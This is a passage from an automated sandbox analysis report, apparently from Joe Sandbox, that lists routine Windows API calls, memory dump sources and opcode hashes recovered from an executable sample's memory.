                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: 103b8a1ee4988b837acd70fb08a19b3578edbb2170d3f702e9c7e5c8ac937e36
                                                                                  • Instruction ID: 1a44049d7764866551fd2a80ba6e1007cd1ec8d6962cd1a7594299ccb25889f2
                                                                                  • Opcode Fuzzy Hash: 103b8a1ee4988b837acd70fb08a19b3578edbb2170d3f702e9c7e5c8ac937e36
                                                                                  • Instruction Fuzzy Hash: 02E002B2204309BFDB00DE8ADCC1DABB7ACFB4C654F804105BB1C972428275AD608BB1
                                                                                  APIs
                                                                                  • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DBB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: bab68b94e60c1c39486eeb5bf66ad965beb01bd87e0540aab64b0e3bc6725fb1
                                                                                  • Instruction ID: ecd03004e85e01efbe3a4d1c3c4f91e1e7f70863d980c278341a4ba4e6036cdb
                                                                                  • Opcode Fuzzy Hash: bab68b94e60c1c39486eeb5bf66ad965beb01bd87e0540aab64b0e3bc6725fb1
                                                                                  • Instruction Fuzzy Hash: 4AE07EB2600119AF9B40DE8CDC81EEB37EDAB1D350F454016FA08E7201C274EC519BA4
                                                                                  APIs
                                                                                  • FindClose.KERNEL32(00000000,000000FF,00468CF5,00000000,004699BD,?,00000000,00469A06,?,00000000,00469B3F,?,00000000,?,00000000), ref: 004529C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFind
                                                                                  • String ID:
                                                                                  • API String ID: 1863332320-0
                                                                                  • Opcode ID: 328f5273132c764b9a3d4dc1fb611fbc24c86244664778d0246df45220df8576
                                                                                  • Instruction ID: 65a054a9b97f401e8a070c67ca2626b1ef3cf16f308e501cfa64c935d7e24c62
                                                                                  • Opcode Fuzzy Hash: 328f5273132c764b9a3d4dc1fb611fbc24c86244664778d0246df45220df8576
                                                                                  • Instruction Fuzzy Hash: EFE092B0B046048BDB14DF3A898121A7AD25F89320F04C66BAC9CCB3D7D67CC45A5667
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(00488F52,?,00488F72,?,?,00000000,00488F52,?,?), ref: 00414613
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                  • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                  • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                  • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                  APIs
                                                                                  • CompareStringA.KERNEL32(00000400,00000000,00000000,00000000,00000000,00000000,00000000,?,0042C555,00000000,0042C572,?,?,00000000,?,00000000), ref: 00406AF1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CompareString
                                                                                  • String ID:
                                                                                  • API String ID: 1825529933-0
                                                                                  • Opcode ID: f92337a724c11181a044fd1686fe9ef9cd3dbe96318ff2163ed73e48db582b74
                                                                                  • Instruction ID: 0b7e307bfc14650e043a785ca356d6d8cfed1aeeea1ec775d718dd049edb96a1
                                                                                  • Opcode Fuzzy Hash: f92337a724c11181a044fd1686fe9ef9cd3dbe96318ff2163ed73e48db582b74
                                                                                  • Instruction Fuzzy Hash: 65D09ED13005103AD2547A7E0C82F5F498C4B0871AF00553EB608F72D3C5ACDF01067D
                                                                                  APIs
                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406EA8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: cb8f29a85457869a2dbf8e61c91cafba23c6b13386df1fc270c7d637ddbbb9fe
                                                                                  • Instruction ID: d945fc1ae4f4a5b11ea868c9593e63d1521971ee7639f74440e1b278f3ed836a
                                                                                  • Opcode Fuzzy Hash: cb8f29a85457869a2dbf8e61c91cafba23c6b13386df1fc270c7d637ddbbb9fe
                                                                                  • Instruction Fuzzy Hash: 1CD05B763082107BD220955BAC44EAF6BDCCBC9770F11063EB558D32C1D6709C01C7B5
                                                                                  APIs
                                                                                    • Part of subcall function 00423570: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 00423585
                                                                                  • ShowWindow.USER32(004105C8,00000009,?,00000000,0041ED1C,004238B2,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B84), ref: 004235DF
                                                                                    • Part of subcall function 004235A0: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 004235BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoParametersSystem$ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3202724764-0
                                                                                  • Opcode ID: f9a8cca6bf8a46d6b6c67ff3aa65da8397826218557f19502958528695f28d8a
                                                                                  • Instruction ID: 518765a4cacbef888a480a4815de317d9320d0330ae166ab9fd8a5c0ce1297c6
                                                                                  • Opcode Fuzzy Hash: f9a8cca6bf8a46d6b6c67ff3aa65da8397826218557f19502958528695f28d8a
                                                                                  • Instruction Fuzzy Hash: 4ED05E127422703142103AB72845A8B42E84DC62A7389042BB458CB202FD1ECF8160BC
                                                                                  APIs
                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 00424254
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: TextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 530164218-0
                                                                                  • Opcode ID: e174dc81b867ed5ba5fbd35468b9ffce48adeaf1e3288ddff8b8907e7f3f360f
                                                                                  • Instruction ID: 79a8d0166c5429b0aed06161c18178c7d256087b7bd5654ebc5455f265553556
                                                                                  • Opcode Fuzzy Hash: e174dc81b867ed5ba5fbd35468b9ffce48adeaf1e3288ddff8b8907e7f3f360f
                                                                                  • Instruction Fuzzy Hash: C9D05BE270012017C705BBFD54C4AC567CC4B8825671440A7F914EB257D678CD408398
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,004614DC,00000000,00000000,00000000,0000000C,00000000), ref: 0046087C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                  • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                  • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                  • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00450137,00000000), ref: 0042CBE3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 696c079d1e659a807bafa968d47e5a3e4cea9be412662ea6c9d5bc89f686c2e0
                                                                                  • Instruction ID: 3f909b4991432e57cbd71e9521c6fa99081743ec33e4372fb99709aa22c8c451
                                                                                  • Opcode Fuzzy Hash: 696c079d1e659a807bafa968d47e5a3e4cea9be412662ea6c9d5bc89f686c2e0
                                                                                  • Instruction Fuzzy Hash: 0EC08CE131121006DA6475BD3CC720F0A8849483393A40E37B428F33D2D2BDE817202C
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A83C,0040CDE8,?,00000000,?), ref: 00406E61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: ef6727adbc76e4448bedcecadaf15b9a1be2a7abaed01fb32c8a3ed0db94e53c
                                                                                  • Instruction ID: 1716efc7a7a5fc259e55466b53f0f4780718e82ca7bae079f5c863eff473355b
                                                                                  • Opcode Fuzzy Hash: ef6727adbc76e4448bedcecadaf15b9a1be2a7abaed01fb32c8a3ed0db94e53c
                                                                                  • Instruction Fuzzy Hash: 89C048B138030032F52035B62C87F2A05489704B19E60943AB740FE1C2C8E9AC14025C
                                                                                  APIs
                                                                                  • SetCurrentDirectoryA.KERNEL32(00000000,?,0048B2FA,00000000,0048B497,?,?,00000005,00000000,0048B4CB,?,?,00000000), ref: 00407237
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory
                                                                                  • String ID:
                                                                                  • API String ID: 1611563598-0
                                                                                  • Opcode ID: 4a5ae1bbc38f106eaf86e321a514aa0d2701ef3dbaf289bab3351053f441ce84
                                                                                  • Instruction ID: cd60317c871f226fadd0360a9cb1dc89089301687d78bdcaa738a6012b6dfbea
                                                                                  • Opcode Fuzzy Hash: 4a5ae1bbc38f106eaf86e321a514aa0d2701ef3dbaf289bab3351053f441ce84
                                                                                  • Instruction Fuzzy Hash: 92B012F039020A0BCE1079FE4CC1A1601CC4A0C3153401B3A3106F71C3DABCC4040518
                                                                                  APIs
                                                                                  • SetEndOfFile.KERNEL32(?,00000000,004672F2), ref: 0044F5BB
                                                                                    • Part of subcall function 0044F4AC: GetLastError.KERNEL32(0044F1B8,0044F2DD,?,00000000,?,0048B32E,00000001,00000000,00000002,00000000,0048B497,?,?,00000005,00000000,0048B4CB), ref: 0044F4AF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLast
                                                                                  • String ID:
                                                                                  • API String ID: 734332943-0
                                                                                  • Opcode ID: 8a9ac5278392e16bf21344970941f4d2631d243c2371afff51164ea790ed4152
                                                                                  • Instruction ID: 7660bf3454e1455e01bef16317e42c3d241e86ca0619148132159454de4feed7
                                                                                  • Opcode Fuzzy Hash: 8a9ac5278392e16bf21344970941f4d2631d243c2371afff51164ea790ed4152
                                                                                  • Instruction Fuzzy Hash: 8EC04C6170050057AB40AAAA85C1A0763D85A582143004476B505CB217EB68DC044A14
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(?,0042E1D1), ref: 0042E1C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 1a07c8b72c9bb2abe6f56cbe30ebc187b43b98e9b2e62074d48c4d919d718940
                                                                                  • Instruction ID: 3845d0c03a9ef21131ceaed60e9f9ab11310ef7ae2b2bfbb9ca998827109b267
                                                                                  • Opcode Fuzzy Hash: 1a07c8b72c9bb2abe6f56cbe30ebc187b43b98e9b2e62074d48c4d919d718940
                                                                                  • Instruction Fuzzy Hash: 64B09B7670C6045DFB0D9695785142973D4D7CC7103E14477F400D6581D53C9410492C
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 15102f7382d34fed751781a5022c55e4c44b9a191595ad2a6c0bef55f1a25186
                                                                                  • Instruction ID: 1ce170ef3856c5e5d78223f1f3cba59b6108a5a3f73b0e5965cb31cca447c574
                                                                                  • Opcode Fuzzy Hash: 15102f7382d34fed751781a5022c55e4c44b9a191595ad2a6c0bef55f1a25186
                                                                                  • Instruction Fuzzy Hash: 47A002755025009ADA00E7A5C849F7A2298BB44204FD915F9714897052C93C99008E55
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f363dcf9d25b216b74df29daa290b2c06e8e8983a5802dd843e12d267c5dac46
                                                                                  • Instruction ID: 8be3686ef8e38482b574c206d86eee9c614667ebd55327d1fd6e03ee1cc07725
                                                                                  • Opcode Fuzzy Hash: f363dcf9d25b216b74df29daa290b2c06e8e8983a5802dd843e12d267c5dac46
                                                                                  • Instruction Fuzzy Hash: C0519770A041499FEB11EFA5C882AAFBBF5EF49314F10447AE500E7351D738AD42CB98
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED1C,?,00423807,00423B84,0041ED1C), ref: 0041F35A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 3b57ff38d79880723931ce7a4323c33c278339fc7370ca559a86e6572e7f09fd
                                                                                  • Instruction ID: 7a86b3f7519b685682b1973289781229205e369203e58ee8dd188ce315784d97
                                                                                  • Opcode Fuzzy Hash: 3b57ff38d79880723931ce7a4323c33c278339fc7370ca559a86e6572e7f09fd
                                                                                  • Instruction Fuzzy Hash: EF115E742403059FD710DF1AC880B86F7E4EF58350F50C93AE9689B385D374E846CBA9
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00000000,00450F81), ref: 00450F63
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1452528299-0
                                                                                  • Opcode ID: 5abc4685f4c84650da47e3cc0df50f24bb9a6635d5c062d951d7f4b521dc5dcc
                                                                                  • Instruction ID: e70c2e81ce28adcde32f783ff6f4adba3ebb1fb49fdcadde835400e025dae540
                                                                                  • Opcode Fuzzy Hash: 5abc4685f4c84650da47e3cc0df50f24bb9a6635d5c062d951d7f4b521dc5dcc
                                                                                  • Instruction Fuzzy Hash: 6B01FC3A6042046E8B21DF6998014EEF7E8EB497307554677FC54D3381D6745D059654
                                                                                  APIs
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,0045A639), ref: 0045A518
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1263568516-0
                                                                                  • Opcode ID: 047a1f493df2e2996a203d9972338f01691395b35fba312353f1f6526d44d6d6
                                                                                  • Instruction ID: 8b5ee3f5d6e5d12db40a3368b7ddba6daff4e65dc0246a9cce7aa6115441ffa4
                                                                                  • Opcode Fuzzy Hash: 047a1f493df2e2996a203d9972338f01691395b35fba312353f1f6526d44d6d6
                                                                                  • Instruction Fuzzy Hash: 12D09EB17503005FDBD4DF794CC1B0736D8AB08700B5185766908DB286F674D9118B58
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2984623064.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2984593779.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984826906.000000000048D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2984886905.000000000049D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_is-3J7FL.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: 7ff171a7414b7a081d63a3a1bf7630b587f205fb066492e2cc5a824bccb9c9bd
                                                                                  • Instruction ID: 56b9152c401b1c0a285676e9325b85ad2fc7f65617b8aebdb3a897c9874f60a6
                                                                                  • Opcode Fuzzy Hash: 7ff171a7414b7a081d63a3a1bf7630b587f205fb066492e2cc5a824bccb9c9bd
                                                                                  • Instruction Fuzzy Hash:
                                                                                  APIs
                                                                                    • Part of subcall function 0044A630: GetVersionExA.KERNEL32(00000094), ref: 0044A64D
                                                                                  • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044E8C9,0048BF91), ref: 0044A6AB
                                                                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044A6C3
                                                                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044A6D5
                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044A6E7
                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044A6F9
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044A70B
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044A71D
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044A72F
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044A741
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044A753
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044A765
                                                                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044A777
                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044A789
                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044A79B
                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044A7AD
                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044A7BF
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044A7D1
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044A7E3
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044A7F5
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044A807
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044A819
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044A82B
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044A83D
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044A84F
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044A861
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044A873
                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044A885
